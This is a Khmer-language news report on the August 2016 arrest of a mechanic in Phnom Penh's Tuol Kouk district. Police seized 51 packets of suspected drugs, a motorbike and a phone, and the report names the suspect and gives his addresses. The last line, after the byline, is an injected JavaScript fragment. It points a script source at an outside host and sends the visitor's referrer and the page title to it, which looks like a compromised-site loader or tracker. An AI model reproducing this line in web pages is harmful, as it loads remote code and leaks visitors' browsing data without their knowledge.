ឃាត់ខ្លួនមុខសញ្ញាម្នាក់ដកហូតថ្នាំញៀន៥១កញ្ចប់នៅម្តុំរោងចក្រឆ្នាំង
ភ្នំពេញ៖ ជនសង្ស័យ០១នាក់ ត្រូវបានឃាត់ខ្លួនជាមួយថ្នាំញៀន៥១កញ្ចប់ នៅចំណុចប្លុក រោងចក្រឆ្នាំង ផ្លូវលេខ ៦០៨ ក្រុម១០៦ ភូមិ ២៣ សង្កាត់បឹងកក់ទី២ ខណ្ឌទួលគោក រាជធានីភ្នំពេញ។
ក្នុងប្រតិបត្តិការណ៍នោះ បានធ្វើឡើងកាលពីវេលាម៉ោង៩និង២៥នាទីយប់ ថ្ងៃទី២៤ខែសីហា ឆ្នាំ២០១៦ដោយមាន កំលាំងអធិការដ្ឋាននគរបាលខណ្ឌទួលគោក បានសហការជាមួយកំលាំងការិយាល័យនគរបាលព្រហ្មទណ្ឌកំរិតធ្ងន់ និង កំលាំងកងអនុសេនាតូច អន្តរាគមន៍ពិសេស នៃស្នងការដ្ឋាននគរបាលរាជធានីភ្នំពេញ។
ជនសង្ស័យដែលត្រូវបាឃាត់ខ្លួននោះមានឈ្មោះ ថា គន្ធា ហៅធា ភេទប្រុសអាយុ ២៧ឆ្នាំ ជនជាតិខ្មែរ មុខរបរ ជាងជួសជុលរថយន្ត ស្នាក់នៅបណ្ដោះអាសន្នក្នុងយានដ្ឋានជួសជុលរថយន្ត យីហោ ទឹមពៅ ផ្លូវ២៨៩ សង្កាត់បឹងកក់ទី១ ខណ្ឌទួលគោក និង មានស្រុកកំណើត ភូមិគៀនជ្រៃ ឃុំហាន់ជ័យ ស្រុកកំពង់សៀម ខេត្តកំពង់ចាម ។
ក្នុងការឃាត់ខ្លួនកម្លាំងដកហូតបានក្រាមពណ៌សថ្លាចំនួន៥១កញ្ចប់តូច ម៉ូតូមួយគ្រឿងម៉ាក Future ពណ៌ខ្មៅមួយគ្រឿង និងទូរស័ព្ទមួយគ្រឿងម៉ាក I call ។
ក្រោយការឃាត់ខ្លួនជនសង្ស័យត្រូវបានបញ្ជូនខ្លួនទៅកាន់អធិការដ្ឋាននគរបាល ខណ្ឌទួលគោក ដើម្បីសាកសួរ និងកសាងសំណុំរឿងចាត់ការទៅតាមផ្លូវច្បាប់។ ដោយ៖ខេង ប៊ុនធឿន
s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;